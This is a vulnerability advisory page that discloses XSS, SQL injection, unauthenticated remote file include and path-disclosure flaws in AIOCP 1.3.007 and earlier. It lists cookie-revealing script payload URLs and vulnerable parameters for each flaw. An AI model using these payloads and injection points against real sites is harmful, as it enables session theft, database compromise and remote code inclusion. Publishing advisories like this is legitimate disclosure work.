AIOCP <=1.3.007 multiples vulnerabilities [sql , remote file include , xss]

2006.11.10
Risk: High
Local: No
Remote: Yes
CWE: N/A

AIOCP <=1.3.007 multiples vulnerabilities[injection sql , remote file include , xss] XSS get = - /public/code/cp_forum_view.php?fmode=top&topid=</textarea>'"><script>ale rt(document.cookie)</script> - /public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea>'"><s cript>alert(document.cookie)</script> - /public/code/cp_forum_view.php?fmode=top&topid=53&forid=23&catid=</texta rea>'"><script>alert(document.cookie)</script> - /public/code/cp_dpage.php?choosed_language=</textarea>'"><script>alert(d ocument.cookie)</script> - /public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea>'"><s cript>alert(document.cookie)</script> - /public/code/cp_forum_view.php?fmode=top&topid=53&forid=3&catid=</textar ea>'"><script>alert(document.cookie)</script> - /public/code/cp_show_ec_products.php?order_field=</textarea>'"><script>a lert(document.cookie)</script> - /public/code/cp_users_online.php?order_field=</textarea>'"><script>alert (document.cookie)</script> - /public/code/cp_links_search.php?orderdir=</textarea>'"><script>alert(do cument.cookie)</script> xss post in user profile : - signature - fiscal code remote file include = /admin/code/index.php?load_page=http%3A//google.com ( no login needed for the remote file include ) sql injection = - /public/code/cp_dpage.php?choosed_language=[sql] - /public/code/cp_news.php?choosed_language=[sql] - /public/code/cp_news.php?news_category=[sql] - /public/code/cp_forum_view.php?choosed_language=[sql] - /public/code/cp_edit_user.php?choosed_language=[sql] - /public/code/cp_newsletter.php?nlmsg_nlcatid=[sql] - /public/code/cp_newsletter.php?choosed_language=[sql] - /public/code/cp_links.php?links_category=[sql] - /public/code/cp_links.php?choosed_language=[sql] - /public/code/cp_contact_us.php?choosed_language=[sql] - /public/code/cp_show_ec_products.php?product_category_id=[sql] - /public/code/cp_show_ec_products.php?product_category_id=[sql] - /public/code/cp_show_ec_products.php?order_field=[sql] - /public/code/cp_login.php?choosed_language=[sql] - /public/code/cp_users_online.php?order_field=cpsession_expiry&submitted= 1&firstrow=[sql] - /public/code/cp_codice_fiscale.php?choosed_language=[sql] - /public/code/cp_links_search.php?orderdir=[sql] full path disclosure = - /public/code/cp_dpage.php?choosed_language=eng&aiocp_dp[]=_main - /public/code/cp_show_ec_products.php?order_field[]= - /public/code/cp_show_page_help.php?hp[]= global risk = hight laurent gaffi & benjamin moss http://s-a-p.ca/ saps.audit (at) gmail (dot) com [email concealed]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top